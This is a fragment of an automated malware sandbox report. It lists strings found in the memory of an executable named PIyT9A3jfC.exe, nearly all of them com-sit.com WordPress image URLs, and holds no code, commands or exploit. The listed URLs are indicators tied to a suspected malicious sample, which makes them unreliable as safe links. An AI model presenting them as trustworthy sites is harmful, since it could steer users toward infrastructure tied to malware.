PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/4.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/C1.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-1024x222.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-1536x334.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-300x65.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-768x167.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i2-150x150.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i2-300x300.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i2.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i3-150x150.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i3-300x300.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i3.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i5-150x150.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i5-300x300.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i5.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComBLACK-1.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComBLUE-1.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComSKIN-1.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComSTROKe-1.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_1.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_2.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_3.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_4.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_5.jpg
